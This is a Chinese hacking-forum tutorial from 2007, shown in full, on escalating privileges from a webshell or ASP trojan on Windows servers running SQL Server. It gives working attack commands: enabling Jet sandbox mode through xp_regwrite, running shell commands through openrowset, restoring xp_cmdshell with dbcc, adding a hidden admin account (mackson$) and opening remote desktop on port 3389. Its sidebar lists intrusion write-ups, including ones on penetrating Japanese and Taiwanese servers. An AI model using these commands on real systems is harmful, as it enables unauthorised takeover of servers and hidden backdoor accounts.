webshell提权与asp木马提权--webshell,提权,asp木马,asp,木马

[推荐]webshell提权与asp木马提权

热荐 ★★★★★

webshell提权与asp木马提权

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-9-4

把132提升权限

后面就用sql的cmd shell你想干什么就干什么吧.其实也可以windows下提权工具也很多.
SA权限仅需xp_regwrite即可有dos shell
删除xp_cmdshell和xplog70.dll不用担心，只要保留xp_regwrite就可以执行系统命令，拥有一个dos shell
利用RDS的一个老问题，在IIS 4.0的时候被广泛利用，现在好像没多少人想得起来了
绝对比去想办法恢复xp_cmdshell来得经济实惠，不过需要猜一下系统路径
nt/2k: x:\winnt\system32\
xp/2003: x:\windows\system32\
如果有回显，可以看到执行返回结果，否则需要先判断主机OS类型再试
当然如果野蛮一点，四个轮流来一遍也行。

首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE''SOFTWARE\Microsoft\Jet\4.0\Engines''SandBoxMode''REG_DWORD'1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0'';database=c:\winnt\system32\ias\ias.mdb''select shell("cmd.exe /c net user admin admin1234 /add")')

扩展储存过程被删除以后可以有很简单的办法恢复：
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复，不用去管sp_addextendedproc是不是存在

-----------------------------

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshell

asp木马提权

net user 查看是否有cmd的权限
如果没有用海洋2005配合上传的cmd.exe来执行
假如:上传一个工具ftp.exe 具体的路径是：D:\mine\ftp.exe
现在加个管理员帐号命令是 D:\mine\ftp.exe "net user mackson$ mackson /add"
现在我们来把mackson这个帐号提升为管理员````
这里是命令D:\mine\ftp.exe"net localgroup administrators mackson$ /add"
现在我们来看看mackson 这个帐号的资料命令： net user mackson$
如果是管理员的话，现在我们主要是去开他3389 然后终端连接
我们传个3389.exe去
D:\mine\3389.exe这就是开33898终端服务的工具路径了````
上传开启3389的软件地址：D:\mine\3389.exe
我们只要在CMD里面输入D:\mine\ftp.exe "D:\mine\3389.exe"
现在只需要在CMD命令输入里面输入上面的命令 然后回车就可以开他3389 了
服务器重启中。。。。。
重启后，打开远程桌面连接。。。

上一页 [1] [2] [3]

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章： MSSQL差异备份取系统权限(带演示动画)

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

	抽根憋闷烟的心声
	学习网页制作的理由
	加入终身会员的理由!!!
	学习黑客编程的5大理由
	学习免杀的6大理由
	学习软件破解的理由
	常见问题解答
	汇款向导
	学员报名咨询

	webshell提权与asp木马提权	09-04
	MSSQL差异备份取系统权限(带演示	09-01
	渗透日本服务器群	07-18
	入侵藏在防火墙后面的机子	07-18
	对台湾视频站点的再次渗透尝试	07-18
	Serv-u6.0提权新招	07-04
	用“电驴”抓肉鸡	06-29
	MS07-029漏洞利用入侵过程	05-30
	实例讲解：入侵JSP网站服务器	05-09
	利用ANI漏洞攻破VISTA系统[视频演	04-11
	利用php.exe进行入侵	04-08
	渗透心得	04-07